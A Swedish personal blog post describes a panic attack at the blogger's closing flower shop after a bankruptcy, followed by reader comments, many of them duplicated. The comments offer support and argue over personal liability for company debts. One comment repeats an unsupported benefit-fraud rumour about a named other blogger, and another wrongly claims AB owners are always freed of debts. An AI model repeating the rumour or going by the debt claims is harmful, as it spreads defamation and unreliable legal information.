Jag föll ihop! Rakt ner i asfalten, ner i det svarta hålet! Panikångest igen….

IMG_8009hej fina! Lång, tung och jobbig dag! Förbered dig på ett känslomässigt  kort, bittert och negativt inlägg! OM du inte är upplagd för det, strunta i att läsa detta inlägget…

Bilade ner från Sigtuna till Öland. MEGA ångest i magen, kroppen och själen! Det tog emot, jag ville INTE åka ner. Distansen och avståndet har gjort mig gott…. 

Ludvig var som vanligt HUR ”duktig” och medgörlig som hest…. -TACK underbara, älskade goa unge för att DU är DU! Älskar dig över allt annat! <3 Nu och för alltid!

Vi kom fram till Öland. Jag lämnade honom till sin pappa, Lämnade vovven till sin ”extra husse” farbror Lothar. Åkte hem till min Kalmar-fru, för kvalitetstid och mys på hennes balkong.

Åkte över till butiken….. My’s Blommor. ”Öppet alla dagar” OLYMPUS DIGITAL CAMERA

Butiken står kvar. I fysisk form. Alltså det gör så jävla ont rent ut sagt! Jag vill bara skrika! Protestera! Jag tappar kontrollen! Jag faller ihop, får ingen luft! Drabbas av en riktigt panikångest attack igen! Försöker tänka på andningen försöker ta kontroll över situationen. Men det går inte. jag skakar, gråter, hulkar och får ingen luft. Allt på samma gång!

Det känns om om jag ska dö. Dö på riktigt! jag klarar inte mer, jag orkar inte mer! Jag ligger kvar på asfalten framför min butik….  Andningen återgår till det normala. Jag är ute på djupt vatten.

 Det gör så JÄVLA ONT! Mitt hjärta blöder, jag vill bara gråta, skrika, sparka! All den styrka jag byggt upp under dessa två veckor med Lilleman hemma i Sigtuna är som bortblåst! Nu föll jag precis tillbaka i det där svarta hålet, Ner i det djupaste, mörkaste hålet som finns!

Fan också………. vill inte må såhär. Vill inte vara här! Det gör ont! Allt kommer ifatt. Allt, allt allt!

Jag VET att jag kommer gå stark ur detta… men just precis just nu så låter det bara som ”bla bla bla” i minna öron! Jag MÅSTE härifrån! Jag får panik!  Det är mörkt, väldigt mörkt! OLYMPUS DIGITAL CAMERA

Jag har ingenting mer att göra i butiken ikväll..

Just nu är jag hemma hos en väninna.  Hon har gått och lat sig. jag sitter i ”mitt” rum. Min trygga punkt. Ingen vet vem hon är, inge vet vart hon bor. Mitt gömställe. Min stöttepelare. Min vän <3 Min raka motsats, min trygga, kloka och stabila vän.  

Imorgon ska jag göra  ”Mitt sista” i butiken, sen sätter jag banne mig inte min fot där mer!!! Jag tänker INTE stå och se på när skyltar, inredning och allt bara rivas ner. Tio år av hårt arbete, med blod, svett och tårar. Tio år av med och motgång. Skratt & tårar! Lycka, sorg! Som bara ska förstöras och rivas ner på ett kort litet ögonblick! 

Hur mycket jag än försökt att göra rätt för mig i ALLA lägen, HUR mycket jag än kämpat så räckte det inte till……

jag måste ”bara” förlika mig med det för att kunna gå vidare…. NÄR jag kommit på HUR man ska kunna förlika sig med det!  Då ska jag tala om hur man gör. För det känns nämligen helt j*vla omöjligt just precis just nu! 

Usch! Nu tog orden slut…. jag ska borra in huvudet i min kudde och gråta. jag är ledsen! Detta är ingen bra dag!

Jag backade inte bara något steg, jag är tillbaka på ruta ett! Ledsen för negativt inlägg. Men satan i gatan vilket bakslag! 63 mil av pepp och försök till att övertyga mig själv i bilen att det inte skulle bli så farligt var helt onödigt! Det blev VÄRRE än jag föreställt mig….. MYCKET värre!

/My Martens 

118 Komentarer

 1. Du är där bara det är stort och starkt, jag tror att många bara skulle vända ryggen och gå men du är där och samtidigt som du får ångest så bearbetar du det som händer, ingen tröst i att behöva ha ångest uppe på all sorg men det är så hjärnan bearbetar som sagt. Kram och ta emot hjälp, ju mer jag läst din blogg så verkar du vara en sådan som är van att sköta det mesta själv, men nu får du låna kraft av dina fina vänner <3

 2. KRAM!! ❤
  Allt kommer att ordna sig till slut!, fast det kommer att ta sin tid innan du är på en rakare sträcka av den krokiga (jäkla) vägen!
  Motgångar & livskriser är skit-tufft att ta sig igenom!, och man tror verkligen inte att man ska klara av det … Men det gör man till slut!!!
  Sköt om dig!!

 3. Hej My,
  Jag är ju en av det som förstod sedan länge vad det handlade om. Det är ju bara att gå in och kolla på ditt företags status så förstår man ju att ni har haft problem länge.
  Låt oss säga så här: Om det värsta nu är att du står i skuld på flera mille och därmed måste leva på existensminimum i några år så är det ju inte världens ände för en så ung och driven tjej som du. JA, du är DRIVEN, du kommer ur det!
  Du eller Lilleman är vad jag förstår inte sjuka – ni har din pappa och några av dina vänner väljer att följa dig även i motgång. (Passus: tvi vale de som släpper när nedgång kommer – du kommer aldrig att glömma dom som byggde dig stark igen, vilket så klart kommer)!
  Personligt tips:
  1) Älta aldrig
  2) Umgås bara med dom du är säker på
  När du ska sova:
  -Tänk på hur din farmor (valfritt, äldre kvinna i din släkt) har haft det i sina utmaningar.
  – Tänk igenom din dag som den varit, börja från när du vaknade och ta det timvis – oftast sommar du nog någonstans vid lunch:-)
  – Tänk igenom hur dagen kunde har varit som bäst och jämför med dagen
  Ursäkta kopplingen som du säkert hatar men när Toftby var typ 10+ din ålder så var hon sjukskriven i flera år och under utredning för bidragsfusk men det visste du säkert redan och radera det om du inte vill ha en sådan koppling. Vill bara att du vet att vi är många som vet!

   • Ja det är en bloggare, hon har väl bloggat i ganska många år, tycker den bloggen också är bra med mycket bra tips och recept bl.a.

  • My lär nog inte behöva få några miljonskulder, hon har ju haft AB och då avskrivs skulderna vid konkurs! Man blir skuldfri vid AB, såvida det inte gjorts något kriminellt! Ja visst har hon mycket att vara glad över, känner också att det blir lite väl dramatiskt men förstår samtidigt att det är en sorg men det finns värre saker att råka ut för, My har det ändå bra som har föräldrar och vänner…och på tal om vänner så är det nog inga som svikit pga att ett av hennes företag satts i konkurs, det handlar väl om andra saker och skedde väl innan konkursen, har läst en del på andra bloggar. Bra tips men att sluta älta är inte lätt och att veta om vänner är äkta eller kommer för egen vinning då man har stor blogg kan nog ge lite nojja. Varför skriver du om en annan bloggare, varför påstå saker om någon annan här, vadå koppling? har hon också gått i konkurs menar du? Förstår inte kopplingen och varför du skriver om andra då My bett läsare att INTE skriva om andra, konstigt, hoppas inte My får skit för det du skrev som andra bloggare får om läsare skriver om andra hos dem. Du hjälper nog inte My genom att skriva skit om andra, kanske tvärtom tyvärr.

   • Nej där har du verkligen helt fel! Skulder där man gått i personlig borgen för skrivs ALDRIG någonsin av oavsett bolags form dvs AB, HB, KB eller EK! Det har ingen alls betydelse vad det är för bolags form, har man gått i borgen för företagslån, checkkredit o leasingavtal så ÄR man personligt betalningsskyldig för alla dessa skulder. Det är därför så många företagare vars bolag gått i konkurs, fått ekonomiskt förödande konsekvenser genom att man blivit personligt ansvarig för skulder i och med konkursen. Man är inte alls skyddad ifrån alla skulder i ett AB man kan tom bli personligt betalningsansvarig för precis alla skulder, vilket uppenbart inte många alls vet om. Jag vet vad jag pratar om här för jag har alla erfarenheter ifrån allt sånt här o vet hur allt fungerar o är upplagt.

 4. Du är där bara det är stort och starkt, jag tror att många bara skulle vända ryggen och gå men du är där och samtidigt som du får ångest så bearbetar du det som händer, ingen tröst i att behöva ha ångest uppe på all sorg men det är så hjärnan bearbetar som sagt. Kram och ta emot hjälp, ju mer jag läst din blogg så verkar du vara en sådan som är van att sköta det mesta själv, men nu får du låna kraft av dina fina vänner <3

 5. KRAM!! ❤
  Allt kommer att ordna sig till slut!, fast det kommer att ta sin tid innan du är på en rakare sträcka av den krokiga (jäkla) vägen!
  Motgångar & livskriser är skit-tufft att ta sig igenom!, och man tror verkligen inte att man ska klara av det … Men det gör man till slut!!!
  Sköt om dig!!

 6. Det enda du ska tänka på är att andas, andas, andas. Inget annat. Så länge du kan andas lever du, så länge du lever så fungererar du och så länge du fungerar funkar du.. Men du måste andas, vara i nuet. Har fortfarande hopp om att du ska må bättre till helgen, jag är säker på det, det är du med hoppas jag? Du måste ha delmål i ditt mående. Är inte psykolog men jag utgår från mig själv… Det hjälper, ett litet mål i taget. Varma kramar ??

 7. Hej My,

  Jag är ju en av det som förstod sedan länge vad det handlade om. Det är ju bara att gå in och kolla på ditt företags status så förstår man ju att ni har haft problem länge.

  Låt oss säga så här: Om det värsta nu är att du står i skuld på flera mille och därmed måste leva på existensminimum i några år så är det ju inte världens ände för en så ung och driven tjej som du. JA, du är DRIVEN, du kommer ur det!

  Du eller Lilleman är vad jag förstår inte sjuka – ni har din pappa och några av dina vänner väljer att följa dig även i motgång. (Passus: tvi vale de som släpper när nedgång kommer – du kommer aldrig att glömma dom som byggde dig stark igen, vilket så klart kommer)!

  Personligt tips:
  1) Älta aldrig
  2) Umgås bara med dom du är säker på

  När du ska sova:
  -Tänk på hur din farmor (valfritt, äldre kvinna i din släkt) har haft det i sina utmaningar.
  – Tänk igenom din dag som den varit, börja från när du vaknade och ta det timvis – oftast sommar du nog någonstans vid lunch:-)
  – Tänk igenom hur dagen kunde har varit som bäst och jämför med dagen

  Ursäkta kopplingen som du säkert hatar men när Toftby var typ 10+ din ålder så var hon sjukskriven i flera år och under utredning för bidragsfusk men det visste du säkert redan och radera det om du inte vill ha en sådan koppling. Vill bara att du vet att vi är många som vet!

   • Ja det är en bloggare, hon har väl bloggat i ganska många år, tycker den bloggen också är bra med mycket bra tips och recept bl.a.

  • My lär nog inte behöva få några miljonskulder, hon har ju haft AB och då avskrivs skulderna vid konkurs! Man blir skuldfri vid AB, såvida det inte gjorts något kriminellt! Ja visst har hon mycket att vara glad över, känner också att det blir lite väl dramatiskt men förstår samtidigt att det är en sorg men det finns värre saker att råka ut för, My har det ändå bra som har föräldrar och vänner…och på tal om vänner så är det nog inga som svikit pga att ett av hennes företag satts i konkurs, det handlar väl om andra saker och skedde väl innan konkursen, har läst en del på andra bloggar. Bra tips men att sluta älta är inte lätt och att veta om vänner är äkta eller kommer för egen vinning då man har stor blogg kan nog ge lite nojja. Varför skriver du om en annan bloggare, varför påstå saker om någon annan här, vadå koppling? har hon också gått i konkurs menar du? Förstår inte kopplingen och varför du skriver om andra då My bett läsare att INTE skriva om andra, konstigt, hoppas inte My får skit för det du skrev som andra bloggare får om läsare skriver om andra hos dem. Du hjälper nog inte My genom att skriva skit om andra, kanske tvärtom tyvärr.

   • Nej där har du verkligen helt fel! Skulder där man gått i personlig borgen för skrivs ALDRIG någonsin av oavsett bolags form dvs AB, HB, KB eller EK! Det har ingen alls betydelse vad det är för bolags form, har man gått i borgen för företagslån, checkkredit o leasingavtal så ÄR man personligt betalningsskyldig för alla dessa skulder. Det är därför så många företagare vars bolag gått i konkurs, fått ekonomiskt förödande konsekvenser genom att man blivit personligt ansvarig för skulder i och med konkursen. Man är inte alls skyddad ifrån alla skulder i ett AB man kan tom bli personligt betalningsansvarig för precis alla skulder, vilket uppenbart inte många alls vet om. Jag vet vad jag pratar om här för jag har alla erfarenheter ifrån allt sånt här o vet hur allt fungerar o är upplagt.

 8. Det enda du ska tänka på är att andas, andas, andas. Inget annat. Så länge du kan andas lever du, så länge du lever så fungererar du och så länge du fungerar funkar du.. Men du måste andas, vara i nuet. Har fortfarande hopp om att du ska må bättre till helgen, jag är säker på det, det är du med hoppas jag? Du måste ha delmål i ditt mående. Är inte psykolog men jag utgår från mig själv… Det hjälper, ett litet mål i taget. Varma kramar :)?

 9. Jag själv som står i ”dödens” väntrum har mkt svårt att förstå detta. ..du ör frisk och har livet, du har barn och kommer få vakna till en ny dag….nej det finna så mkt värre än en konkurs. .. så tycker jag…och det kan jag väl få? Kram till dig och se alt detta i ett annat perspektiv nu❤

 10. Du skriver att du är tillbaka på ruta ett, men det är du inte. Sorgeprocessen går fram och tillbaka men du kommer hela tiden lite mer fram. Visserligen med några rejäla bakslag kanske, men ändå framåt. Du måste få vara ledsen för att det du kämpat så hårt för inte lyckades hela vägen. Det viktiga är att man ser de små ljusglimtarna på vägen framåt och efter ett tag märker att ljusglimtarna blir fler och längre.
  Glöm inte andas nu. När du får distans till konkursen kommer det nog ändå kännas bra att du varit på plats idag.
  Många kramar till dig

 11. Men du,har du inga skulder i företaget dvs du har betalt skatter,moms och leverantörerskulder och tom löner då finns det ju inget för dig att betala då är det ju klart.Såvida det inte kommer fram andra saker i bokföringen.Försök att ta det lugnt och ta en sak i taget låt inte tankarna skena i väg.

  • Så enkelt är det inte! Alla verkar tro att bara för My säger att hon betalat leverantörer, skatter så innebär det inte att bank o kreditbolag fått sina pengar. När det exempelvis gäller checkkredit i företag så är det väldigt vanligt i alla fall i små bolag att ägaren själv är personligt ansvarig för att betala denna. I detta fallet är det helt omöjligt att My genom sin utförsäljning skulle kunnat få in så mycket pengar så det täckte alla leverantörsskulder, skatter, företagskrediter inkl checkkredit. Då borde detta ha skett långt innan, för vem vill frivilligt utsätta sig för att hamna o denna situation som nu My sitter i, ja jag kan i alla fall säga att det hade då rakt INTE My utsatt sig för om hon inte hade varit tvungen till det. Det är även så att ägaren av andra själ och orsaker kan vara personligt betalningsansvarig för. Jag tror verkligen inte My skulle gå ut o säga att hon har skulder pga konkursen OM hon verkligen INTE hade det! Hade alla skulder varit betalade så hade bolaget kanske överlevt men inte säkert för det är mycket som spelar roll här som många icke företagare inte vet ett smack om.
   Du ÄR stark My! Vet personligen vilket helvete du går igenom. MEN det kommer att bli bättre med tiden, det tar tid att sörja o smälta allt även om man på sätt o vis ändå var förberedd på vad som skulle hända men ändå så blir det som en chock när allt händer.
   Hoppas det går bra med visningen.
   /Kram

   • Men är det inte så att då man har AB så blir man skuldfri vid konkurs!? My har ju haft AB vet jag hon har skrivit så då blir det väl inga skulder som hon får med sig efter konkursen avlutats, det är vid enskilt bolag man drabbas hårdare eller vid personlig konkurs, och det är det väl inte för My. Läste också någon skrivit här att det tar 2 år att avveckla ett företag och det kostar massor av pengar!? Då är väl ändå en konkurs bättre!? Jag är ej så insatt men läst en del och har läst en del här inne om det och det avskräcker att starta eget. Sägs ju att det är så enkelt att starta eget och ungdomar uppmanas till det idag MEN om det sen inte går runt DÅ kan det blir jobbigt har jag förstått.

    • Märks väl att du inte är insatt alls i hur skulder i ett AB fungerar och vilka personliga åtaganden ägaren har när det bla gäller bolaget skulder. Den enda som vet hur stora skulder man blir ansvarig för i detta läget är My för hon borde veta bäst vad hon skrivit på för borgensförbindelser som nu i o med konkursen åberopas utav kreditgivaren. Tycker inte man ska säga o påstå något som man inte alls har någon aning om, det ger så fel signaler.

 12. Det är svårt sådana händelser.
  Men mycket av det hela har byggts upp under åren och du har innerst inne vetat.
  Även om du kämpat för att klara det
  Alla har sin svåra upplevelser och löser dom på olika sätt.
  Den här resan var du säkert tvungen att göra och den ingår i din personliga process. Sedan får ju folk tycka vad dom vill om det hela.
  Är ju bara du som känner och vet hur du har det.
  Du har ju lilleman och en framtid och kommer att få många underbara stunder/möten längre fram.
  Njut nu lite av den härliga svenska sommaren.
  Änga lite åt dig själv och bara vaa.
  Kram ?

 13. Jag själv som står i ”dödens” väntrum har mkt svårt att förstå detta. ..du ör frisk och har livet, du har barn och kommer få vakna till en ny dag….nej det finna så mkt värre än en konkurs. .. så tycker jag…och det kan jag väl få? Kram till dig och se alt detta i ett annat perspektiv nu❤

 14. Du skriver att du är tillbaka på ruta ett, men det är du inte. Sorgeprocessen går fram och tillbaka men du kommer hela tiden lite mer fram. Visserligen med några rejäla bakslag kanske, men ändå framåt. Du måste få vara ledsen för att det du kämpat så hårt för inte lyckades hela vägen. Det viktiga är att man ser de små ljusglimtarna på vägen framåt och efter ett tag märker att ljusglimtarna blir fler och längre.
  Glöm inte andas nu. När du får distans till konkursen kommer det nog ändå kännas bra att du varit på plats idag.
  Många kramar till dig

 15. Men du,har du inga skulder i företaget dvs du har betalt skatter,moms och leverantörerskulder och tom löner då finns det ju inget för dig att betala då är det ju klart.Såvida det inte kommer fram andra saker i bokföringen.Försök att ta det lugnt och ta en sak i taget låt inte tankarna skena i väg.

  • Så enkelt är det inte! Alla verkar tro att bara för My säger att hon betalat leverantörer, skatter så innebär det inte att bank o kreditbolag fått sina pengar. När det exempelvis gäller checkkredit i företag så är det väldigt vanligt i alla fall i små bolag att ägaren själv är personligt ansvarig för att betala denna. I detta fallet är det helt omöjligt att My genom sin utförsäljning skulle kunnat få in så mycket pengar så det täckte alla leverantörsskulder, skatter, företagskrediter inkl checkkredit. Då borde detta ha skett långt innan, för vem vill frivilligt utsätta sig för att hamna o denna situation som nu My sitter i, ja jag kan i alla fall säga att det hade då rakt INTE My utsatt sig för om hon inte hade varit tvungen till det. Det är även så att ägaren av andra själ och orsaker kan vara personligt betalningsansvarig för. Jag tror verkligen inte My skulle gå ut o säga att hon har skulder pga konkursen OM hon verkligen INTE hade det! Hade alla skulder varit betalade så hade bolaget kanske överlevt men inte säkert för det är mycket som spelar roll här som många icke företagare inte vet ett smack om.

   Du ÄR stark My! Vet personligen vilket helvete du går igenom. MEN det kommer att bli bättre med tiden, det tar tid att sörja o smälta allt även om man på sätt o vis ändå var förberedd på vad som skulle hända men ändå så blir det som en chock när allt händer.

   Hoppas det går bra med visningen.
   /Kram

   • Men är det inte så att då man har AB så blir man skuldfri vid konkurs!? My har ju haft AB vet jag hon har skrivit så då blir det väl inga skulder som hon får med sig efter konkursen avlutats, det är vid enskilt bolag man drabbas hårdare eller vid personlig konkurs, och det är det väl inte för My. Läste också någon skrivit här att det tar 2 år att avveckla ett företag och det kostar massor av pengar!? Då är väl ändå en konkurs bättre!? Jag är ej så insatt men läst en del och har läst en del här inne om det och det avskräcker att starta eget. Sägs ju att det är så enkelt att starta eget och ungdomar uppmanas till det idag MEN om det sen inte går runt DÅ kan det blir jobbigt har jag förstått.

    • Märks väl att du inte är insatt alls i hur skulder i ett AB fungerar och vilka personliga åtaganden ägaren har när det bla gäller bolaget skulder. Den enda som vet hur stora skulder man blir ansvarig för i detta läget är My för hon borde veta bäst vad hon skrivit på för borgensförbindelser som nu i o med konkursen åberopas utav kreditgivaren. Tycker inte man ska säga o påstå något som man inte alls har någon aning om, det ger så fel signaler.

 16. Det är svårt sådana händelser.
  Men mycket av det hela har byggts upp under åren och du har innerst inne vetat.
  Även om du kämpat för att klara det
  Alla har sin svåra upplevelser och löser dom på olika sätt.
  Den här resan var du säkert tvungen att göra och den ingår i din personliga process. Sedan får ju folk tycka vad dom vill om det hela.
  Är ju bara du som känner och vet hur du har det.
  Du har ju lilleman och en framtid och kommer att få många underbara stunder/möten längre fram.
  Njut nu lite av den härliga svenska sommaren.
  Änga lite åt dig själv och bara vaa.
  Kram 🙂

 17. Hej My,
  Antagligen kommer du inte att godkänna denna kommentaren men ändå. Du skrev ju att ingen skulle skriva här inne om andra bloggare? Varför släpper du fram dom kommentarerna för då?
  Då är det ju du som sätter nivån här inne.
  Vill man inte ha spekulationer om dina fd vänner eller andra bloggare godkänner man helt enkelt inte dom kommentarerna.
  För du har ju inget öppet…. Jag kan inte för mitt liv förstå varför du gör det ändå.

   • Karin varför skulle Eva heta Johanna? Säkert är vi flera som tänker som Eva. Tror du att så fort en annan bloggare får ifrågasättande läsarkommentarer att den som kommenterat heter My då??

  • Ja man kan verkligen undra hur vissa kommenterar kan vara okej medans vissa inte är det…Att namnge en person som ovan är lågt och riktigt fult!! Men uppenbarligen gillades det och godkändes..

   • Hej! Jag med fler skötet kommentarsfältet. Det är JÄTTE många som inte släpps igenom, hat, personangrepp osv…. Ibland släpps det igenom liknande kommentarer. Som denna. MEN jag sitter i efterhand och raderar, raderar och raderar! Jag hinner inte med att dubbelkolla allt. Jag har öppet bett mina lösare att inte skriva om andra personer, eller bloggare. Mycket mer än så kan jag inte göra…. Just nu har jag precis avslutat ”öppet hus” i butiken och mött spekulanter, svarat på frågor och sagt ”hej då” till butiken för sista gången….. Att ta en sånhär diskussion och att behöva sätta mig att radera är det SISTA jag orkar lägga min energi på. Nu ska jag in på tingsrätten. Hoppas att mitt budskap och min ståndpunkt är tydlig nog här! Jag vill INTE ha kommentarer om andra människor obehagliga sammanhang! OAVSETT vem det är! /My

    • Är ni flera som godkänner kommentarerna, har du hjälp med det? Men varför sitta i efterhand och radera, det måste väl ta längre tid än att inte godkänna direkt då man granskar dem?? Fint att du tog dig tiden och hann med och orkade skriva och förklara men hade du ju sluppit om du el andra ej släppt igenom och därmed hade du sparat tid ju. Är det även andra som svarar på kommentarer åt dig också ibland kanske? Hoppas allt gick bra på tingsrätten och jag önskar dig en fin kväll! <3

     • Det är bara jag som svarar. Ingen annan. Jag hinner inte med att godkänna kommentarer hela tiden och har sedan konkursen bett om hjälp med det. Alla som driver bloggar har ett helt team bakom sig. Glöm inte det…. Men som sagt, det är min blogg, allt som skriva eller kommenteras här inne är ifrån mig… Mvh

   • Men nu får ni ge er, skallerkärringar här inne, lägg ner dessa spekulationer om My’s vänner hit och dit. Vi läsare har väl ändå inte med det att göra.
    Förstår dig My att du har viktigare saker att stå i än hålla koll på ett kommentarsfält???
    Stor kram till dig My.

  • Hej! Jag med fler skötet kommentarsfältet. Det är JÄTTE många som inte släpps igenom, hat, personangrepp osv…. Ibland släpps det igenom liknande kommentarer. Som denna. MEN jag sitter i efterhand och raderar, raderar och raderar! Jag hinner inte med att dubbelkolla allt. Jag har öppet bett mina lösare att inte skriva om andra personer, eller bloggare. Mycket mer än så kan jag inte göra…. Just nu har jag precis avslutat ”öppet hus” i butiken och mött spekulanter, svarat på frågor och sagt ”hej då” till butiken för sista gången….. Att ta en sånhär diskussion och att behöva sätta mig att radera är det SISTA jag orkar lägga min energi på. Nu ska jag in på tingsrätten. Hoppas att mitt budskap och min ståndpunkt är tydlig nog här! Jag vill INTE ha kommentarer om andra människor obehagliga sammanhang! OAVSETT vem det är! /My

  • Hur länge ska den här mobbingen mot My forsätta!!!!Fruktansvärt lågt!!Finns ingen annan bloggare som tar bort elaka kommentarer om My!!!!Tror som dig Karin,& nu blir nog JT lite ”skitnödig”om det som skrevs!!!

   • Mobbingen mot My?! Var ser du den mobbingen?? Hoppas inte min kommentar sågs som mobbing för det var det inte alls menat som utan bara logiska reflektioner.
    JO flera andra bloggare har raderat kommentarer om My, såg jag senast häromdagen och sett det flera gånger förr så där har du fel Monica!
    Jag tänker att varför först granska och i efterhand radera, då borde det väl vara bättre att inte släppa fram det man läser/granskar så spar man väl tid, och särskilt då man ber sina läsare att inte skriva om andra…men det är klart man kan stoppa elakheter och lögner om sig själv genom att först granska förstås. Nu har jag skrivit nog här för idag känner jag hehe…

 18. Hej My,
  Antagligen kommer du inte att godkänna denna kommentaren men ändå. Du skrev ju att ingen skulle skriva här inne om andra bloggare? Varför släpper du fram dom kommentarerna för då?
  Då är det ju du som sätter nivån här inne.
  Vill man inte ha spekulationer om dina fd vänner eller andra bloggare godkänner man helt enkelt inte dom kommentarerna.
  För du har ju inget öppet…. Jag kan inte för mitt liv förstå varför du gör det ändå.

   • Karin varför skulle Eva heta Johanna? Säkert är vi flera som tänker som Eva. Tror du att så fort en annan bloggare får ifrågasättande läsarkommentarer att den som kommenterat heter My då??

  • Ja man kan verkligen undra hur vissa kommenterar kan vara okej medans vissa inte är det…Att namnge en person som ovan är lågt och riktigt fult!! Men uppenbarligen gillades det och godkändes..

   • Hej! Jag med fler skötet kommentarsfältet. Det är JÄTTE många som inte släpps igenom, hat, personangrepp osv…. Ibland släpps det igenom liknande kommentarer. Som denna. MEN jag sitter i efterhand och raderar, raderar och raderar! Jag hinner inte med att dubbelkolla allt. Jag har öppet bett mina lösare att inte skriva om andra personer, eller bloggare. Mycket mer än så kan jag inte göra…. Just nu har jag precis avslutat ”öppet hus” i butiken och mött spekulanter, svarat på frågor och sagt ”hej då” till butiken för sista gången….. Att ta en sånhär diskussion och att behöva sätta mig att radera är det SISTA jag orkar lägga min energi på. Nu ska jag in på tingsrätten. Hoppas att mitt budskap och min ståndpunkt är tydlig nog här! Jag vill INTE ha kommentarer om andra människor obehagliga sammanhang! OAVSETT vem det är! /My

    • Är ni flera som godkänner kommentarerna, har du hjälp med det? Men varför sitta i efterhand och radera, det måste väl ta längre tid än att inte godkänna direkt då man granskar dem?? Fint att du tog dig tiden och hann med och orkade skriva och förklara men hade du ju sluppit om du el andra ej släppt igenom och därmed hade du sparat tid ju. Är det även andra som svarar på kommentarer åt dig också ibland kanske? Hoppas allt gick bra på tingsrätten och jag önskar dig en fin kväll! <3

     • Det är bara jag som svarar. Ingen annan. Jag hinner inte med att godkänna kommentarer hela tiden och har sedan konkursen bett om hjälp med det. Alla som driver bloggar har ett helt team bakom sig. Glöm inte det…. Men som sagt, det är min blogg, allt som skriva eller kommenteras här inne är ifrån mig… Mvh

   • Men nu får ni ge er, skallerkärringar här inne, lägg ner dessa spekulationer om My’s vänner hit och dit. Vi läsare har väl ändå inte med det att göra.
    Förstår dig My att du har viktigare saker att stå i än hålla koll på ett kommentarsfält???
    Stor kram till dig My.

  • Hej! Jag med fler skötet kommentarsfältet. Det är JÄTTE många som inte släpps igenom, hat, personangrepp osv…. Ibland släpps det igenom liknande kommentarer. Som denna. MEN jag sitter i efterhand och raderar, raderar och raderar! Jag hinner inte med att dubbelkolla allt. Jag har öppet bett mina lösare att inte skriva om andra personer, eller bloggare. Mycket mer än så kan jag inte göra…. Just nu har jag precis avslutat ”öppet hus” i butiken och mött spekulanter, svarat på frågor och sagt ”hej då” till butiken för sista gången….. Att ta en sånhär diskussion och att behöva sätta mig att radera är det SISTA jag orkar lägga min energi på. Nu ska jag in på tingsrätten. Hoppas att mitt budskap och min ståndpunkt är tydlig nog här! Jag vill INTE ha kommentarer om andra människor obehagliga sammanhang! OAVSETT vem det är! /My

  • Hur länge ska den här mobbingen mot My forsätta!!!!Fruktansvärt lågt!!Finns ingen annan bloggare som tar bort elaka kommentarer om My!!!!Tror som dig Karin,& nu blir nog JT lite ”skitnödig”om det som skrevs!!!

   • Mobbingen mot My?! Var ser du den mobbingen?? Hoppas inte min kommentar sågs som mobbing för det var det inte alls menat som utan bara logiska reflektioner.

    JO flera andra bloggare har raderat kommentarer om My, såg jag senast häromdagen och sett det flera gånger förr så där har du fel Monica!

    Jag tänker att varför först granska och i efterhand radera, då borde det väl vara bättre att inte släppa fram det man läser/granskar så spar man väl tid, och särskilt då man ber sina läsare att inte skriva om andra…men det är klart man kan stoppa elakheter och lögner om sig själv genom att först granska förstås. Nu har jag skrivit nog här för idag känner jag hehe…

 19. Förstår att det är jobbigt, men jag tror att du med tiden kommer att bli starkare av de erfarenheter du gör nu. När en dörr stängs öppnas en annan. Tänker på dig ❤

 20. Till något helt annat än konkursen…….
  Han eju så hmla söt din lilleman ?
  Klipp inte av honom håret! Låt det växa……

 21. Förstår att det är jobbigt, men jag tror att du med tiden kommer att bli starkare av de erfarenheter du gör nu. När en dörr stängs öppnas en annan. Tänker på dig ❤

 22. Massor av styrkekramar till Dig <3
  Du kommer fixa det här, ge allt lite tid. Lider med dig när du måste tillbaka till din butik. Men snart slipper du det.
  Tänker på dig <3
  Kram Maria

 23. Du bör inse att du kanske måste ta hjälp för dessa panikångestattacker. Inget att skämmas för, ibland behövs även medicin för en kort tid. Du ska inte behöva ha det så här. Du är ung och stark, du klarar detta !
  Kramisar

 24. Till något helt annat än konkursen…….
  Han eju så hmla söt din lilleman 🙂
  Klipp inte av honom håret! Låt det växa……

 25. Massor av styrkekramar till Dig <3
  Du kommer fixa det här, ge allt lite tid. Lider med dig när du måste tillbaka till din butik. Men snart slipper du det.

  Tänker på dig <3

  Kram Maria

 26. Du bör inse att du kanske måste ta hjälp för dessa panikångestattacker. Inget att skämmas för, ibland behövs även medicin för en kort tid. Du ska inte behöva ha det så här. Du är ung och stark, du klarar detta !
  Kramisar

 27. Vet hur det känns, hade oxå ett företag vi var tvungna att kursa pga av konkurrenterna. Vi var i åkerinäringen! Det var tungt i ca 1 år,hitta nytt jobb osv.nu ganska ok men efter dyningar kommer över en, känns så orättvist när man givit allt. Nu så här är det vänner som varit allt, utan dom hade vi aldrig lämnat botten! Kram allt ordnar sig.

 28. Vet hur det känns, hade oxå ett företag vi var tvungna att kursa pga av konkurrenterna. Vi var i åkerinäringen! Det var tungt i ca 1 år,hitta nytt jobb osv.nu ganska ok men efter dyningar kommer över en, känns så orättvist när man givit allt. Nu så här är det vänner som varit allt, utan dom hade vi aldrig lämnat botten! Kram allt ordnar sig.

 29. Alla moment är ju urtunga att sköta o vara hyfsat trevlig o så! Klart det är urtungt o besvikelser att va i!Affären va ju som en sorts familj också och har man inte massa andra starka hem/hushåll så e de ensamt mitt i allting o se hus o odlingar kollapsa. Sorg ,besvikelser, oro,lessenhet till gränsen till apati, de e hemskt. Jag går på sechand i olika kyrkor, emmaus mm. Har hittat olika ställen för att med inga pengar hitta lite trivselsaker o ändå ge till de ändamål som de har.Inte klokt vad man kan hitta !! Lite terapi för själen att hitta momorskoppar, virkademormors filtar o skapa mysiga miljöer, fylla Kopparna med små blommor.

 30. Fasen det kan inte vara lätt, släpper du inte fram kommentarer så får du skit, släpper du fram de så får du skit… Det gnälls på My att hon inte släpper fram negativa kommentarer mot sig själv, utan bara skulle visa de som står och hejar på henne…
  Hade det varit sanningen så hade det aldrig blivit ngt kackel i kommentarerna, vilket det är mer ofta än sällan.
  Vad ger det dig som skriver saker du vet sårar en annan människa som står och balanserar på kanten? Blir du stolt som fan, slår dig för bröstet och skriver i ditt CV, ”det var jag som satte nådastöten i My Martens, nu lär hon inte komma upp över ytan på ett bra tag”.
  Det pratas en massa om mobbning i skolor och på sociala medier bla, varför kan inte vi som är vuxna försöka stötta varandra istället för att såra, håna eller bara vara elaka?
  Man måste inte älska alla, men man kan iaf visa respekt! Man behöver inte alltid hålla med, livet hade varit jäkligt trist om alla var ja-sägare och inte hade en egen åsikt, men man måste inte vara elak för att poängtera att man tycker att ngt dessa bloggerskor skriver är ”fel”. Gillar man inte vad någon skriver, eller stör sig på personen, så sluta läs, det är inte svårare än så.
  Kom igen nu tjejer/mammor, vi kan väl börja stötta varandra istället för att trycka ner och hugga varandra i ryggen? Känns som om man har så mkt annat att kriga om som kvinna.

